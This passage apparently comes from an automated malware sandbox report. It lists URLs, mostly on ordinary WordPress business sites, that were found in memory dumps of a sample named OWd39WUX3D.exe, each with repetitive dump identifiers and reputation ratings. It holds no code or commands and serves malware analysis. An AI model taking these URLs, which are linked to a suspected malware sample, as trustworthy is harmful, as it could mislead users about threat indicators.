00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.381685715.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.595489063.0000000006E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.elpro.si/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://www.lrsuk.com/OWd39WUX3D.exe, 00000000.00000003.393286215.0000000006B7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://www.elpro.si/kategorija-izdelka/wika-partner/OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.elpro.si/wp-content/plugins/mailchimp-for-woocommerce/public/js/mailchimp-woocommerce-pubOWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://myropcb.com/login/OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.winhui.cn/template/default/img/fixedimg4.pngOWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390445510.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://www.com-sit.com/branchen-know-how/OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://www.elpro.si/wp-content/plugins/cf7-conditional-fields/style.css?ver=2.3.9OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/profesionalni-setiOWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/elektricni-pribor-za-merilnike-tlaka/OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://pohlfood.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpohlfood.com%2FOWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://pohlfood.com/wp-content/uploads/iStock-1031193710b.jpgOWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://www.elpro.si/kategorija-izdelka/grelci-polprevodniski-releji-ssr-in-tiristorji/ssr-rele-polpOWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver=3.16OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584494342.0000000003B10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.7OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://www.com-sit.com/wp-content/uploads/2023/04/comsitBROWN-1.jpgOWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, 